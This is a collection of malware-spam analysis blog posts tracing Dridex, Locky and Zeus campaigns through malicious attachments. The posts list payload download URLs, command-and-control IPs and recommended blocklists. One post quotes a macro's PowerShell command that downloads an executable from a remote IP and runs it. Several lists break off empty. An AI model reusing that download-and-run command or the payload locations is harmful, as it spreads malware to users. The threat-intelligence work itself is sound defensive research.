In this case there was an attachment FedEx_track_98404283928.zip which unzipped into a folder FedEx_track_98404283928 containing in turn a malicious script FedEx_track_98404283928.js which (according to Malwr) attempts to download a binary from one of the following locations:

www.brusasport.com/Brusa/vario/direct/teamviiverupdate2918372.exe
www.microsoft.com/Brusa/vario/direct/teamviiverupdate2918372.exe
www.mega.net/Brusa/vario/direct/teamviiverupdate2918372.exe
www.google.com/Brusa/vario/direct/teamviiverupdate2918372.exe
www.yahoo.com/Brusa/vario/direct/teamviiverupdate2918372.exe

Only the first one is a valid download location, the rest are a smokescreen. The dropped binary has a detection rate of 5/56 but automated analysis [1] [2] [3] is inconclusive. However those reports do seem to indicate attempted network traffic to:

secure.adnxs.metalsystems.it
upfd.pilenga.co.uk

These two subdomains appears to have been hijacked from unrelated Register.IT customers and are hosted on a questionable-looking customer of OVH Italy on 188.165.157.176:

This Tweet from ‏@pancak3lullz indicates that this IP is associated with Anrdomeda rather than the usual recent patterns of Locky or Dridex (which has.. err.. dried up recently). It appears to have been a malicious IP for more than a month.

Of interest is that almost every part of this chain (including the spam sending IP of 31.27.229.22) is in Italy.

As with a great deal of recent spam, this is delivered via a .js script in a ZIP file. If you can configure your mail filters to reject such things then you will be a whole lot safer.

In the two samples I have seen, there are attachments named Security Report.zip and Security Notification.zip which in turn contain a Word document with a name such as Security Report ID(11701573).doc

The two documents that I have seen have detection rates of about 3/56 [1] [2] but according to these automated analyses [3] [4] [5] [6] it seems that the infection doesn't work properly, failing to find a created file harakiri.exe. This Malwr report shows a dropped file named harakiri.pfx which isn't an executable, my guess is that this is an encrypted file that hasn't decrypted properly.

UPDATE

According to a third party analysis, this apparently drops Dridex which phones home to:

210.245.92.63 (FPT Telecom Company, Vietnam)
162.251.84.219 (PDR Solutions, US)
80.88.89.222 (Aruba, Italy)

Attached is a file with a name that matches the randomly-generated order (in this case, ORDER-525-2814418-9619799.docm). According to analysis by a couple of other trusted parties, the various versions of the malicious document download a binary from:

www.smileybins.com.au/0u8ggf5f5
kpmanish.com/0u8ggf5f5
neoventtechnologies.com/0u8ggf5f5
itronsecurity.com/0u8ggf5f5

ambikaonline.com/0u8ggf5f5
usacarsimportsac.com/0u8ggf5f5
giftsandbaskets.co.th/0u8ggf5f5

This dropped executable has a detection rate of 6/56. The Hybrid Analysis and DeepViz Analysis plus some data sourced from other parties (thank you) indicates that the malware calls back to the following IPs:

186.250.48.10 (Redfox Telecomunicações Ltda., Brazil)
193.90.12.221 (MultiNet AS, Norway)
194.116.73.71 (Topix, Italy)
200.159.128.144 (Novanet da Barra Ass e Inf LTDA, Brazil)

The payload here appears to be the Dridex banking trojan.

UPDATE 2016-04-26

Another identical round of this spam is being sent out, complete with the formatting error that prevents the body text being displayed on some email clients. VirusTotal detection rates for the two samples I have seen are 5/57 [1] [2]. Hybrid Analysis of the attachments [3] [4] shows download locations at:

shagunproperty.com/987gby8nn8
aysanatorganizasyon.com/987gby8nn8

A trusted source tells me there are other download locations at:

cubasedersi.com/987gby8nn8

factumtech.com/987gby8nn8

seahawkexports.com/987gby8nn8
solucionhumana.mx/987gby8nn8

From here a binary is dropped on the system with a detection rate of 3/56. Those Hybrid analyses plus this DeepViz report show network traffic to:

176.9.113.216 (Hetzner, Germany)

Apparently there are C2 servers here:

186.250.48.10 (Redfox Telecomunicações Ltda, Brazil)
200.159.128.144 (Novanet da Barra Ass e Inf LTDA, Brazil)

The payload still appears to be Dridex.

Attached is a file with a name matching the reference in the email, e.g. 0006432242.tgz which is a compressed archive file, containing in turn another archive file with a name like 5611205-19.04.2016.tar and it that archive is a malicious script named in an almost identical format the the TAR file (e.g. 5611205-19.04.2016.js). This script has a typical detection rate of 8/56.

So far I have seen two versions of this script, downloading from:

mountainworldtreks.com/9uhg5vd3
secondary36.obec.go.th/9uhg5vd3

The downloaded binary is the same in both cases. This Hybrid Analysis and DeepViz Analysis indicate network traffic to:

In the only sample I have seen so far, there is an attachment Document No 992958719.doc which has a VirusTotal detection rate of 7/56. The Malwr report for that document shows that it downloads a binary from:

bi.pushthetraffic.com/87ty8hbvcr44

There are probably many other download locations. This dropped file has a detection rate of 6/56. The DeepViz report and Hybrid Analysis between then identify what is likely to be Dridex, phoning home to the following servers:

Details on the individual emails vary. Attached is a ZIP file which contains one of a variety of malicious scripts (sample VirusTotal results [1] [2] [3] [4]). According to these Malwr reports [5] [6] [7] these scripts attempt to download a malicious binary from the following locations:

http://hellomississmithqq.com/69.exe?1

Malware spam: "Please find attached 2 invoices for processing." leads to Locky

This email has been scanned by the Symantec Email Security.cloud service.

Attached is a file with a name similar to Payment_2016_March_111812.zip which contains two scripts, which in the samples I have seen all start with "see_it" or "problem". These malicious scripts all have low detection rates [1] [2] [3] [4] [5] [6]. The Malwr reports for those samples [7] [8] [9] [10] [11] [12] show that the scripts download a binary from:

ihsanind.com/system/logs/87jhg44g5
nguoitieudungthongthai.com/system/logs/987i6u5y4t
astralia.ro/08o76g445g [404]

Only two of the download locations work, dropping binaries with a detection rate of 5/55 [1] [2]. Note that there may be other download locations.

The Malwr reports indicate that the malware phones home to:

78.40.108.39 (PS Internet Company LLC, Kazakhstan)
149.154.157.14 (EDIS, Italy)

The payload is the Locky ransomware.

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, itlmeteo.it is the 29th most popular site in Italy and the 1305th most popular worlwide.

This URLquery report shows the scripts with the injected code:

The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

On 195.110.124.133

A couple of days ago I recommended blocking 195.110.124.133 (Register.it, Italy) as a malware C&C server. It turns out that I didn't do enough checking, and this is a parking server with nearly 200k sites on it, mostly for Italian customers.

You might want to unblock the IP and block the domain ftp.videotre.tv.it instead. On the other hand, there is still some actual evil-ness on this server so you may want to keep it blocked, especially if you don't send much traffic in Italy's way.

Malware sites to block 12/6/13

This is a refresh of this list of domains and IPs controlled by what I call the "Amerika" gang, and it follows on from this BBB spam run earlier. Note that IPs included in this list show recent malicious activity, but it could be that they have now been fixed. I also noticed that a couple of the domains may have been sinkholed, but it will do you no harm to block them anyway.

Malware sites to block 29/5/13

These domains and IP addresses are connected to this malware spam run and belong to a group I call the "Amerika" gang (because they tend to use fake US addresses for their WHOIS details but really seem to be Russian).

It's quite a long set of lists: first there is a list of malware domains, then a list of malicious IPs and their web hosts, followed by a plain recommended blocklist list of IPs for copy-and-pasting, finally a list of IPs that are advertised as nameservers within this group for research purposes only.

You might notice something odd going on at the University of Illinois in the 128.174.240.0/24 range. Hmm..

Evil network: 108.178.59.0/26

There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)

So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad an should be blocked.

Singlehop have reallocated the IP range to a customer:

network:Class-Name:network
network:ID:ORG-SINGL-8.108-178-59-0/26
network:Auth-Area:108.178.0.0/18
network:IP-Network:108.178.59.0/26
network:Organization:Lorenzo Coco
network:Street-Address:via Nardi, 8 Prato
network:City:Prato
network:State:Italy
network:Postal-Code:59100
network:Country-Code:IT
network:Tech-Contact;I:NETWO1546-ARIN
network:Admin-Contact;I:NETWO1546-ARIN
network:Abuse-Contact;I:ABUSE2492-ARIN
network:Created:20120430
network:Updated:20120430

It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent.

Added: You can also add 108.178.59.6 to the list of malicious sites.

Some malware sites to block

These sites and IPs seem to be distributing some sort of Zeus variant. In this case users are being enticed to download a file called Fattura.zip (Italian for "invoice") which then contains an executable with the name Fattura.Doc_________________________________________________________________.exe (there are 65 underscores in the filename). That seems daft until you realise that all those underscores are designed to hide the .exe extension by making the filename so big that it is truncated.

At the moment, the malware (MD5 09886612d542e1b354aeda6a16f9ccf5)  is poorly detected (4/43 at VirusTotal). ThreatExpert's prognosis is here.

The back end is a big more interesting and gives a large number of IPs and domains to block if you want to be proactive about stopping this sort of thing.

The back end servers are primarly:
41.189.229.65 (Djibouti Telecom)
60.19.30.131 (China Unicom)
60.19.30.135 (China Unicom)
67.40.211.116 (Qwest Communications, Seattle)
71.217.16.11 (Qwest Communications, Seattle)
82.210.157.9 (Aster, Poland)
113.161.87.176 (VietNam Post and Telecom Corporation)
195.214.238.241 (Interphone, Ukraine)
202.199.160.107 (Dongbei University of Finance and Economics, China)
